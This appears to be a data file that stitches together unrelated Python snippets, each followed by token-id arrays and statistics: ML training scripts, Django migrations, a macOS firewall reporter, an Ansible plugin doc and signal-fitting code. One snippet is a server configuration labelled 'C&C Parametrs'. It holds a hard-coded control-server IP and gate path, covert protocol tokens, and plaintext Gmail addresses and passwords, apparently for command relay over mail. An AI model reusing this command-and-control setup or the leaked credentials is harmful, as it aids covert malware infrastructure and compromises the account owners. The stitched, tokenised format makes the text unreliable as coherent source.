import numpy as np from sklearn.utils.multiclass import type_of_target from mindware.base_estimator import BaseEstimator from mindware.components.utils.constants import type_dict, MULTILABEL_CLS, IMG_CLS, TEXT_CLS, OBJECT_DET from mindware.components.feature_engineering.transformation_graph import DataNode
[ 11748, 299, 32152, 355, 45941, 198, 6738, 1341, 35720, 13, 26791, 13, 16680, 291, 31172, 1330, 2099, 62, 1659, 62, 16793, 198, 6738, 2000, 1574, 13, 8692, 62, 395, 320, 1352, 1330, 7308, 22362, 320, 1352, 198, 6738, 2000, 1574, 13, 55...
3.131313
99
# -*- coding: utf-8 -*- import scrapy import json import os import codecs from AnimeSpider.items import AnimespiderItem
[ 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 11748, 15881, 88, 198, 11748, 33918, 198, 11748, 28686, 198, 11748, 40481, 82, 198, 6738, 27812, 41294, 13, 23814, 1330, 1052, 999, 79, 1304, 7449, 628 ]
3.025
40
import cv2 print cv2.__version__
[ 11748, 269, 85, 17, 198, 4798, 269, 85, 17, 13, 834, 9641, 834, 220, 198 ]
2.266667
15
"""Setup for pytest-testplan plugin.""" from setuptools import setup setup( name='pytest-testplan', version='0.1.0', description='A pytest plugin to generate a CSV test report.', author='Darlene Wong', author_email='darlene.py@gmail.com', license='MIT', py_modules=['pytest_testplan'], install_requires=['pytest'], entry_points={'pytest11': ['testplan = pytest_testplan', ]}, )
[ 37811, 40786, 329, 12972, 9288, 12, 9288, 11578, 13877, 526, 15931, 198, 6738, 900, 37623, 10141, 1330, 9058, 628, 198, 40406, 7, 198, 220, 220, 220, 1438, 11639, 9078, 9288, 12, 9288, 11578, 3256, 198, 220, 220, 220, 2196, 11639, 15, ...
2.632911
158
# GPU # https://paddlex.readthedocs.io/zh_CN/develop/appendix/parameters.html#gpu import os os.environ['CUDA_VISIBLE_DEVICES'] = '0' from paddlex.det import transforms import paddlex as pdx # aluminum_dataset = 'https://bj.bcebos.com/paddlex/examples/industrial_quality_inspection/datasets/aluminum_inspection.tar.gz' pdx.utils.download_and_decompress(aluminum_dataset, path='./') # transforms # API https://paddlex.readthedocs.io/zh_CN/develop/apis/transforms/det_transforms.html train_transforms = transforms.Compose([ transforms.MixupImage(mixup_epoch=250), transforms.RandomDistort(), transforms.RandomExpand(), transforms.RandomCrop(), transforms.Resize( target_size=608, interp='RANDOM'), transforms.RandomHorizontalFlip(), transforms.Normalize() ]) eval_transforms = transforms.Compose([ transforms.Resize( target_size=608, interp='CUBIC'), transforms.Normalize() ]) # # APIhttps://paddlex.readthedocs.io/zh_CN/develop/apis/datasets.html#paddlex-datasets-vocdetection train_dataset = pdx.datasets.VOCDetection( data_dir='aluminum_inspection', file_list='aluminum_inspection/train_list.txt', label_list='aluminum_inspection/labels.txt', transforms=train_transforms, shuffle=True) eval_dataset = pdx.datasets.VOCDetection( data_dir='aluminum_inspection', file_list='aluminum_inspection/val_list.txt', label_list='aluminum_inspection/labels.txt', transforms=eval_transforms) # # VisualDLhttps://paddlex.readthedocs.io/zh_CN/develop/train/visualdl.html num_classes = len(train_dataset.labels) # API: https://paddlex.readthedocs.io/zh_CN/develop/apis/models/detection.html#paddlex-det-yolov3 model = pdx.det.YOLOv3(num_classes=num_classes, backbone='MobileNetV3_large') # API: https://paddlex.readthedocs.io/zh_CN/develop/apis/models/detection.html#train # https://paddlex.readthedocs.io/zh_CN/develop/appendix/parameters.html model.train( num_epochs=400, train_dataset=train_dataset, train_batch_size=8, eval_dataset=eval_dataset, warmup_steps=4000, learning_rate=0.000125, lr_decay_epochs=[240, 320], save_dir='output/yolov3_mobilenetv3', use_vdl=True)
[ 2, 11362, 198, 2, 3740, 1378, 79, 2860, 2588, 13, 961, 83, 704, 420, 82, 13, 952, 14, 23548, 62, 44175, 14, 16244, 14, 1324, 19573, 14, 17143, 7307, 13, 6494, 2, 46999, 198, 11748, 28686, 198, 418, 13, 268, 2268, 17816, 43633, 563...
2.46538
881
# Generated by Django 3.1.4 on 2021-01-07 19:32 from django.db import migrations, models import django.db.models.deletion
[ 2, 2980, 515, 416, 37770, 513, 13, 16, 13, 19, 319, 33448, 12, 486, 12, 2998, 678, 25, 2624, 198, 198, 6738, 42625, 14208, 13, 9945, 1330, 15720, 602, 11, 4981, 198, 11748, 42625, 14208, 13, 9945, 13, 27530, 13, 2934, 1616, 295, 6...
2.818182
44
# -*- coding: utf-8 -*- from __future__ import unicode_literals from django.db import models, migrations import wooey.models.mixins
[ 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 6738, 11593, 37443, 834, 1330, 28000, 1098, 62, 17201, 874, 198, 198, 6738, 42625, 14208, 13, 9945, 1330, 4981, 11, 15720, 602, 198, 11748, 36440, 2959, 13, 27530, 13, 1...
2.913043
46
#!/usr/bin/python """ Firewall for munkireport. By Tuxudo Will return all details about how the firewall is configured """ import subprocess import os import sys import platform import re import plistlib import json sys.path.insert(0,'/usr/local/munki') sys.path.insert(0, '/usr/local/munkireport') from munkilib import FoundationPlist def get_firewall_info(): '''Uses system profiler to get firewall info for the machine.''' cmd = ['/usr/sbin/system_profiler', 'SPFirewallDataType', '-xml'] proc = subprocess.Popen(cmd, shell=False, bufsize=-1, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) (output, unused_error) = proc.communicate() try: plist = plistlib.readPlistFromString(output) # system_profiler xml is an array firewall_dict = plist[0] items = firewall_dict['_items'] return items except Exception: return {} def flatten_firewall_info(array): '''Un-nest firewall info, return array with objects with relevant keys''' firewall = {} for obj in array: for item in obj: if item == '_items': out = out + flatten_firewall_info(obj['_items']) elif item == 'spfirewall_services': for service in obj[item]: if obj[item][service] == "spfirewall_allow_all": obj[item][service] = 1 else: obj[item][service] = 0 firewall['services'] = json.dumps(obj[item]) elif item == 'spfirewall_applications': for application in obj[item]: if obj[item][application] == "spfirewall_allow_all": obj[item][application] = 1 else: obj[item][application] = 0 firewall['applications'] = json.dumps(obj[item]) return firewall def main(): """Main""" # Skip manual check if len(sys.argv) > 1: if sys.argv[1] == 'manualcheck': print 'Manual check: skipping' exit(0) # Create cache dir if it does not exist cachedir = '%s/cache' % os.path.dirname(os.path.realpath(__file__)) if not os.path.exists(cachedir): os.makedirs(cachedir) # Set the encoding # The "ugly hack" :P reload(sys) sys.setdefaultencoding('utf8') # Get results result = dict() info = get_firewall_info() result = merge_two_dicts(flatten_firewall_info(info), get_alf_preferences()) # Write firewall results to cache output_plist = os.path.join(cachedir, 'firewall.plist') FoundationPlist.writePlist(result, output_plist) #print FoundationPlist.writePlistToString(result) if __name__ == "__main__": main()
[ 2, 48443, 14629, 14, 8800, 14, 29412, 198, 198, 37811, 198, 13543, 11930, 329, 285, 2954, 557, 634, 13, 198, 3886, 309, 2821, 12003, 198, 8743, 1441, 477, 3307, 546, 703, 262, 32928, 318, 17839, 198, 37811, 198, 198, 11748, 850, 14681...
2.15258
1,337
# AUTOGENERATED! DO NOT EDIT! File to edit: nbs/metrics.ipynb (unless otherwise specified). __all__ = ['recall_at_k', 'precision_at_k'] # Cell from typing import List # Cell def recall_at_k(predictions: List[int], targets: List[int], k: int = 10) -> float: """Computes `Recall@k` from the given predictions and targets sets.""" predictions_set = set(predictions[:k]) targets_set = set(targets) result = len(targets_set & predictions_set) / float(len(targets_set)) return result # Cell def precision_at_k(predictions: List[int], targets: List[int], k: int = 10) -> float: """Computes `Precision@k` from the given predictions and targets sets.""" predictions_set = set(predictions[:k]) targets_set = set(targets) result = len(targets_set & predictions_set) / float(len(predictions_set)) return result
[ 2, 47044, 7730, 1677, 1137, 11617, 0, 8410, 5626, 48483, 0, 9220, 284, 4370, 25, 299, 1443, 14, 4164, 10466, 13, 541, 2047, 65, 357, 25252, 4306, 7368, 737, 198, 198, 834, 439, 834, 796, 37250, 8344, 439, 62, 265, 62, 74, 3256, 70...
2.797342
301
#!/usr/bin/env/ python import os from math import pi import numpy as np from numpy import ma from scipy.optimize import leastsq import matplotlib.pyplot as plt from uncertainties import ufloat # local modules from .io import load_pendulum_mat_file def average_rectified_sections(data): '''Returns a slice of an oscillating data vector based on the max and min of the mean of the sections created by retifiying the data. Parameters ---------- data : ndarray, shape(n,) Returns ------- data : ndarray, shape(m,) A slice where m is typically less than n. Notes ----- This is a function to try to handle the fact that some of the data from the torsional pendulum had a beating like phenomena and we only want to select a section of the data that doesn't seem to exhibit the phenomena. ''' # subtract the mean so that there are zero crossings meanSubData = data - np.mean(data) # find the zero crossings zeroCrossings = np.where(np.diff(np.sign(meanSubData)))[0] # add a zero to the beginning crossings = np.concatenate((np.array([0]), zeroCrossings)) # find the mean value of the rectified sections and the local indice secMean = [] localMeanInd = [] for sec in np.split(np.abs(meanSubData), zeroCrossings): localMeanInd.append(np.argmax(sec)) secMean.append(np.mean(sec)) meanInd = [] # make the global indices for i, val in enumerate(crossings): meanInd.append(val + localMeanInd[i]) # only take the top part of the data because some the zero crossings can be # a lot at one point mainly due to the resolution of the daq box threshold = np.mean(secMean) secMeanOverThresh = [] indice = [] for i, val in enumerate(secMean): if val > threshold: secMeanOverThresh.append(val) indice.append(meanInd[i]) # now return the data based on the max value and the min value maxInd = indice[np.argmax(secMeanOverThresh)] minInd = indice[np.argmin(secMeanOverThresh)] return data[maxInd:minInd] def calc_periods_for_files(directory, filenames, forkIsSplit): '''Calculates the period for all filenames in directory. Parameters ---------- directory : string This is the path to the RawData directory. filenames : list List of all the mat file names in the RawData directory. forkIsSplit : boolean True if the fork is broken into a handlebar and fork and false if the fork and handlebar was measured together. Returns ------- periods : dictionary Contains all the periods for the mat files in the RawData directory. ''' periods = {} def pathParts(path): '''Splits a path into a list of its parts.''' components = [] while True: (path,tail) = os.path.split(path) if tail == "": components.reverse() return components components.append(tail) pathToRawDataParts = pathParts(directory) pathToRawDataParts.pop() pathToBicycleDir = os.path.join(pathToRawDataParts[0], pathToRawDataParts[1], pathToRawDataParts[2]) pathToPlotDir = os.path.join(pathToBicycleDir, 'Plots', 'PendulumFit') # make sure there is a place to save the plots if not os.path.exists(pathToPlotDir): os.makedirs(pathToPlotDir) for f in filenames: print("Calculating the period for:", f) # load the pendulum data pathToMatFile = os.path.join(directory, f) matData = load_pendulum_mat_file(pathToMatFile) # generate a variable name for this period periodKey = get_period_key(matData, forkIsSplit) # calculate the period sampleRate = get_sample_rate(matData) pathToPlotFile = os.path.join(pathToPlotDir, os.path.splitext(f)[0] + '.png') period = get_period_from_truncated(matData['data'], sampleRate, pathToPlotFile) print("The period is:", period, "\n") # either append the the period or if it isn't there yet, then # make a new list try: periods[periodKey].append(period) except KeyError: periods[periodKey] = [period] # now average all the periods for k, v in periods.items(): if k.startswith('T'): periods[k] = np.mean(v) return periods def check_for_period(mp, forkIsSplit): '''Returns whether the fork is split into two pieces and whether the period calculations need to happen again. Parameters ---------- mp : dictionary Dictionary the measured parameters. forkIsSplit : boolean True if the fork is broken into a handlebar and fork and false if the fork and handlebar was measured together. Returns ------- forcePeriodCalc : boolean True if there wasn't enough period data in mp, false if there was. forkIsSplit : boolean True if the fork is broken into a handlebar and fork and false if the fork and handlebar was measured together. ''' forcePeriodCalc = False #Check to see if mp contains at enough periods to not need # recalculation ncTSum = 0 ntTSum = 0 for key in mp.keys(): # check for any periods in the keys if key[:2] == 'Tc': ncTSum += 1 elif key[:2] == 'Tt': ntTSum += 1 # if there isn't enough data then force the period cals again if forkIsSplit: if ncTSum < 5 or ntTSum < 11: forcePeriodCalc = True else: if ncTSum < 4 or ntTSum < 8: forcePeriodCalc = True return forcePeriodCalc def fit_goodness(ym, yp): ''' Calculate the goodness of fit. Parameters ---------- ym : ndarray, shape(n,) The vector of measured values. yp : ndarry, shape(n,) The vector of predicted values. Returns ------- rsq : float The r squared value of the fit. SSE : float The error sum of squares. SST : float The total sum of squares. SSR : float The regression sum of squares. ''' SSR = np.sum((yp - np.mean(ym))**2) SST = np.sum((ym - np.mean(ym))**2) SSE = SST - SSR rsq = SSR / SST return rsq, SSE, SST, SSR def get_period(data, sampleRate, pathToPlotFile): '''Returns the period and uncertainty for data resembling a decaying oscillation. Parameters ---------- data : ndarray, shape(n,) A time series that resembles a decaying oscillation. sampleRate : int The frequency that data was sampled at. pathToPlotFile : string A path to the file to print the plots. Returns ------- T : ufloat The period of oscillation and its uncertainty. ''' y = data x = np.linspace(0., (len(y) - 1) / float(sampleRate), num=len(y)) def fitfunc(p, t): '''Decaying oscillation function.''' a = p[0] b = np.exp(-p[3] * p[4] * t) c = p[1] * np.sin(p[4] * np.sqrt(1 - p[3]**2) * t) d = p[2] * np.cos(p[4] * np.sqrt(1 - p[3]**2) * t) return a + b * (c + d) # initial guesses #p0 = np.array([1.35, -.5, -.75, 0.01, 3.93]) # guess from delft #p0 = np.array([2.5, -.75, -.75, 0.001, 4.3]) # guess from ucd p0 = make_guess(data, sampleRate) # tries to make a good guess # create the error function errfunc = lambda p, t, y: fitfunc(p, t) - y # minimize the error function p1, success = leastsq(errfunc, p0[:], args=(x, y)) lscurve = fitfunc(p1, x) # find the uncertainty in the fit parameters rsq, SSE, SST, SSR = fit_goodness(y, lscurve) sigma = np.sqrt(SSE / (len(y) - len(p0))) # calculate the jacobian L = jac_fitfunc(p1, x) # the Hessian H = np.dot(L.T, L) # the covariance matrix U = sigma**2. * np.linalg.inv(H) # the standard deviations sigp = np.sqrt(U.diagonal()) # natural frequency wo = ufloat(p1[4], sigp[4]) # damping ratio zeta = ufloat(p1[3], sigp[3]) # damped natural frequency wd = (1. - zeta**2.)**(1. / 2.) * wo # damped natural frequency (hz) fd = wd / 2. / pi # period T = 1. / fd # plot the data and save it to file fig = plt.figure() plot_osfit(x, y, lscurve, p1, rsq, T, m=np.max(x), fig=fig) plt.savefig(pathToPlotFile) plt.close() # return the period return T def get_period_key(matData, forkIsSplit): '''Returns a dictionary key for the period entries. Parameters ---------- matData : dictionary The data imported from a pendulum mat file. forkIsSplit : boolean True if the fork is broken into a handlebar and fork and false if the fork and handlebar was measured together. Returns ------- key : string A key of the form 'T[pendulum][part][orientation]'. For example, if it is the frame that was hung as a torsional pendulum at the second orientation angle then the key would be 'TtB2'. ''' # set up the subscripting for the period key subscripts = {'Fwheel': 'F', 'Rwheel': 'R', 'Frame': 'B', 'Flywheel': 'D'} # the Flywheel is for the gyro bike and it actually represents the front # wheel and the flywheel as one rigid body. It was easier to measure the # the inertia this way. So...the to get the actual flywheel inertia, one # must subtract the inertia of the Fwheel, F, from the Flywheel, D. if forkIsSplit: subscripts['Fork'] = 'S' subscripts['Handlebar'] = 'G' else: subscripts['Fork'] = 'H' try: subscripts[matData['rod']] = 'P' except KeyError: subscripts['Rod'] = 'P' # used to convert word ordinals to numbers ordinal = {'First' : '1', 'Second' : '2', 'Third' : '3', 'Fourth' : '4', 'Fifth' : '5', 'Sixth' : '6'} try: orienWord = matData['angleOrder'] except: orienWord = matData['angle'] pend = matData['pendulum'][0].lower() part = subscripts[matData['part']] orienNum = ordinal[orienWord] return 'T' + pend + part + orienNum def get_sample_rate(matData): '''Returns the sample rate for the data.''' if 'ActualRate' in matData.keys(): sampleRate = matData['ActualRate'] else: sampleRate = matData['sampleRate'] return sampleRate def jac_fitfunc(p, t): ''' Calculate the Jacobian of a decaying oscillation function. Uses the analytical formulations of the partial derivatives. Parameters ---------- p : the five parameters of the equation t : time vector Returns ------- jac : The jacobian, the partial of the vector function with respect to the parameters vector. A 5 x N matrix where N is the number of time steps. ''' jac = np.zeros((len(p), len(t))) e = np.exp(-p[3] * p[4] * t) dampsq = np.sqrt(1 - p[3]**2) s = np.sin(dampsq * p[4] * t) c = np.cos(dampsq * p[4] * t) jac[0] = np.ones_like(t) jac[1] = e * s jac[2] = e * c jac[3] = (-p[4] * t * e * (p[1] * s + p[2] * c) + e * (-p[1] * p[3] * p[4] * t / dampsq * c + p[2] * p[3] * p[4] * t / dampsq * s)) jac[4] = (-p[3] * t * e * (p[1] * s + p[2] * c) + e * dampsq * t * (p[1] * c - p[2] * s)) return jac.T def make_guess(data, sampleRate): '''Returns a decent starting point for fitting the decaying oscillation function. ''' p = np.zeros(5) # the first unknown is the shift along the y axis p[0] = np.mean(data) # work with the mean subtracted data from now on data = data - p[0] # what is the initial slope of the curve if data[10] > data[0]: slope = 1 else: slope = -1 # the second is the amplitude for the sin function p[1] = slope * np.max(data) / 2 # the third is the amplitude for the cos function p[2] = slope * np.max(data) # the fourth is the damping ratio and is typically small, 0.001 < zeta < 0.02 p[3] = 0.001 # the fifth is the undamped natural frequency # first remove the data around zero dataMasked = ma.masked_inside(data, -0.1, 0.1) # find the zero crossings zeroCrossings = np.where(np.diff(np.sign(dataMasked)))[0] # remove redundant crossings zero = [] for i, v in enumerate(zeroCrossings): if abs(v - zeroCrossings[i - 1]) > 20: zero.append(v) # get the samples per period samplesPerPeriod = 2*np.mean(np.diff(zero)) # now the frequency p[4] = (samplesPerPeriod / float(sampleRate) /2. / pi)**-1 if np.isnan(p[4]): p[4] = 4. return p def plot_osfit(t, ym, yf, p, rsq, T, m=None, fig=None): '''Plot fitted data over the measured Parameters ---------- t : ndarray (n,) Measurement time in seconds ym : ndarray (n,) The measured voltage yf : ndarray (n,) p : ndarray (5,) The fit parameters for the decaying osicallation fucntion rsq : float The r squared value of y (the fit) T : float The period m : float The maximum value to plot Returns ------- fig : the figure ''' # figure properties figwidth = 4. # in inches goldenMean = (np.sqrt(5) - 1.0) / 2.0 figsize = [figwidth, figwidth * goldenMean] params = {#'backend': 'ps', 'axes.labelsize': 8, 'axes.titlesize': 8, 'text.fontsize': 8, 'legend.fontsize': 8, 'xtick.labelsize': 6, 'ytick.labelsize': 6, 'text.usetex': True, #'figure.figsize': figsize } if fig: fig = fig else: fig = plt.figure(2) fig.set_size_inches(figsize) plt.rcParams.update(params) ax1 = plt.axes([0.125, 0.125, 0.9-0.125, 0.65]) #if m == None: #end = len(t) #else: #end = t[round(m/t[-1]*len(t))] ax1.plot(t, ym, '.', markersize=2) plt.plot(t, yf, 'k-') plt.xlabel('Time [s]') plt.ylabel('Amplitude [V]') equation = r'$f(t)={0:1.2f}+e^{{-({3:1.3f})({4:1.1f})t}}\left[{1:1.2f}\sin{{\sqrt{{1-{3:1.3f}^2}}{4:1.1f}t}}+{2:1.2f}\cos{{\sqrt{{1-{3:1.3f}^2}}{4:1.1f}t}}\right]$'.format(p[0], p[1], p[2], p[3], p[4]) rsquare = '$r^2={0:1.3f}$'.format(rsq) period = '$T={0} s$'.format(T) plt.title(equation + '\n' + rsquare + ', ' + period) plt.legend(['Measured', 'Fit']) if m is not None: plt.xlim((0, m)) else: pass return fig def select_good_data(data, percent): '''Returns a slice of the data from the index at maximum value to the index at a percent of the maximum value. Parameters ---------- data : ndarray, shape(1,) This should be a decaying function. percent : float The percent of the maximum to clip. This basically snips of the beginning and end of the data so that the super damped tails are gone and also any weirdness at the beginning. ''' meanSub = data - np.mean(data) maxVal = np.max(np.abs(meanSub)) maxInd = np.argmax(np.abs(meanSub)) for i, v in reversed(list(enumerate(meanSub))): if v > percent * maxVal: minInd = i break return data[maxInd:minInd]
[ 2, 48443, 14629, 14, 8800, 14, 24330, 14, 21015, 198, 198, 11748, 28686, 198, 6738, 10688, 1330, 31028, 198, 198, 11748, 299, 32152, 355, 45941, 198, 6738, 299, 32152, 1330, 17266, 198, 6738, 629, 541, 88, 13, 40085, 1096, 1330, 1551, ...
2.293565
6,806
import time import warnings import matplotlib.pyplot as plt import numpy as np import sympy as sp from .global_qbx import global_qbx_self from .mesh import apply_interp_mat, gauss_rule, panelize_symbolic_surface, upsample # prep step 2: find the minimum distance at which integrals are computed # to the required tolerance
[ 11748, 640, 198, 11748, 14601, 198, 198, 11748, 2603, 29487, 8019, 13, 9078, 29487, 355, 458, 83, 198, 11748, 299, 32152, 355, 45941, 198, 11748, 10558, 88, 355, 599, 198, 198, 6738, 764, 20541, 62, 80, 65, 87, 1330, 3298, 62, 80, 6...
3.267327
101
# -*- coding: utf-8 -*- BROKER_URL = 'amqp://guest@localhost//' CELERY_ACCEPT_CONTENT = ['json'], CELERY_RESULT_BACKEND = 'amqp://guest@localhost//' CELERY_RESULT_SERIALIZER = 'json' CELERY_TASK_SERIALIZER = 'json' CELERY_TIMEZONE = 'Asia/Shanghai' CELERY_ENABLE_UTC = False
[ 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 198, 11473, 11380, 1137, 62, 21886, 796, 705, 321, 80, 79, 1378, 5162, 395, 31, 36750, 1003, 6, 198, 198, 34, 3698, 19664, 62, 2246, 42006, 62, 37815, 3525, 796, 37250...
2.114504
131
import logging as log
[ 11748, 18931, 355, 2604, 628 ]
4.6
5
import aspose.email from aspose.email.clients.imap import ImapClient from aspose.email.clients import SecurityOptions from aspose.email.clients.imap import ImapQueryBuilder import datetime as dt if __name__ == '__main__': run()
[ 11748, 355, 3455, 13, 12888, 198, 6738, 355, 3455, 13, 12888, 13, 565, 2334, 13, 320, 499, 1330, 1846, 499, 11792, 198, 6738, 355, 3455, 13, 12888, 13, 565, 2334, 1330, 4765, 29046, 198, 6738, 355, 3455, 13, 12888, 13, 565, 2334, 13...
3.065789
76
# Server UID SERVER_UID = 45158729 # Setup Logging system ######################################### # import os from FileConsoleLogger import FileConsoleLogger ServerLogger = FileConsoleLogger( os.path.join(os.path.dirname(os.path.abspath(__file__)), "_w3server.log") ) W3Logger = FileConsoleLogger( os.path.join(os.path.dirname(os.path.abspath(__file__)), "_w3.log") ) # # Setup Level 2 Protocol - P2Scheme ######################################### # from P2Scheme import P2Scheme P2_URL_TOKEN = '760e25f9eb3124'.decode('hex') P2_SUBJECT_TOKEN = '\x55\xaa\x63\x68\x69\x6e\x61' P2_DATA_TOKEN = '\x55\xaa\x63\x68\x69\x6e\x61' # P2_DATA_TOKEN = 'd85a8c54fbe5e6'.decode('hex') MARK = 'itwm=' B64_JUNK_LEN = 9 BIN_JUNK_LEN = 4 P2_Scheme = P2Scheme(_url_token=P2_URL_TOKEN, _data_token=P2_DATA_TOKEN, _mark=MARK, _subj_token=P2_SUBJECT_TOKEN,\ _b64junk_len=B64_JUNK_LEN, _binary_junk_len=BIN_JUNK_LEN) # # Setup Level 3 Protocol - P3Scheme ######################################### # from P3Scheme import P3Scheme # P3_PRIVATE_TOKEN = 'a20e25f9aa3fe4'.decode('hex') P3_SERVICE_TOKEN = '015a1354acf1b1'.decode('hex') # P3_Scheme = P3Scheme(private_token=P3_PRIVATE_TOKEN, service_token=P3_SERVICE_TOKEN) # # Setup HTTP checker # #from HTTPHeadersChecker import HTTPHeadersChecker # #HTTPChecker = HTTPHeadersChecker() # Setup LocalStorage # from FSLocalStorage import FSLocalStorage LocalStorage = FSLocalStorage() ############################################################ # Initialize Server instance # # #from W3Server import W3Server #MAIN_HANDLER = W3Server(p2_scheme=P2_Scheme, p3_scheme=P3_Scheme, http_checker=HTTPChecker, local_storage=LocalStorage, logger=ServerLogger) ############################################################ # Mail Parameters POP3_MAIL_IP = 'pop.gmail.com' POP3_PORT = 995 POP3_ADDR = 'jassnovember30@gmail.com' POP3_PASS = '30Jass11' SMTP_MAIL_IP = 'smtp.gmail.com' SMTP_PORT = 587 SMTP_TO_ADDR = 'userdf783@mailtransition.com' SMTP_FROM_ADDR = 'ginabetz75@gmail.com' SMTP_PASS = '75Gina75' # C&C Parametrs # XAS_IP = '104.152.187.66' XAS_GATE = '/updates/' ############################################################ # Setup P3 communication # wsgi2 # LS_TIMEOUT = 1 # big loop timeout FILES_PER_ITER = 5 # count of requests per iter ############################################################
[ 2, 9652, 25105, 198, 35009, 5959, 62, 27586, 796, 4153, 1314, 5774, 1959, 198, 198, 2, 31122, 5972, 2667, 1080, 1303, 29113, 7804, 198, 2, 198, 11748, 28686, 198, 6738, 9220, 47581, 11187, 1362, 1330, 9220, 47581, 11187, 1362, 198, 198,...
2.497886
946
from regression_tests import *
[ 6738, 20683, 62, 41989, 1330, 1635, 628, 628, 628, 628, 628, 628, 628, 198 ]
3.214286
14
import subprocess
[ 11748, 850, 14681 ]
5.666667
3
# -*- coding: utf-8 -*- # Copyright: (c) 2018, Ansible Project # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) from __future__ import (absolute_import, division, print_function) __metaclass__ = type DOCUMENTATION = """ become: runas short_description: Run As user description: - This become plugins allows your remote/login user to execute commands as another user via the windows runas facility. author: ansible (@core) version_added: "2.8" options: become_user: description: User you 'become' to execute the task ini: - section: privilege_escalation key: become_user - section: runas_become_plugin key: user vars: - name: ansible_become_user - name: ansible_runas_user env: - name: ANSIBLE_BECOME_USER - name: ANSIBLE_RUNAS_USER required: True become_flags: description: Options to pass to runas, a space delimited list of k=v pairs default: '' ini: - section: privilege_escalation key: become_flags - section: runas_become_plugin key: flags vars: - name: ansible_become_flags - name: ansible_runas_flags env: - name: ANSIBLE_BECOME_FLAGS - name: ANSIBLE_RUNAS_FLAGS become_pass: description: password ini: - section: runas_become_plugin key: password vars: - name: ansible_become_password - name: ansible_become_pass - name: ansible_runas_runas env: - name: ANSIBLE_BECOME_PASS - name: ANSIBLE_RUNAS_PASS notes: - runas is really implemented in the powershell module handler and as such can only be used with winrm connections. - This plugin ignores the 'become_exe' setting as it uses an API and not an executable. """ from ansible.plugins.become import BecomeBase
[ 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 2, 15069, 25, 357, 66, 8, 2864, 11, 28038, 856, 4935, 198, 2, 22961, 3611, 5094, 13789, 410, 18, 13, 15, 10, 357, 3826, 27975, 45761, 393, 3740, 1378, 2503, 13, 4179...
2.045709
1,072
#!/usr/bin/env python # -*- coding: utf-8 -*- ''' ~Gros ''' from hashlib import sha256 import random def add_padding(data, block_size=16): """add PKCS#7 padding""" size = block_size - (len(data)%block_size) return data+chr(size)*size def strip_padding(data, block_size=16): """strip PKCS#7 padding""" padding = ord(data[-1]) if padding == 0 or padding > block_size or data[-padding:] != chr(padding)*padding: raise Exception("Invalid padding") return data[:-padding]
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 198, 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 198, 7061, 6, 198, 93, 38, 4951, 198, 7061, 6, 198, 198, 6738, 12234, 8019, 1330, 427, 64, 11645, 198, 11748, 4738, ...
2.575758
198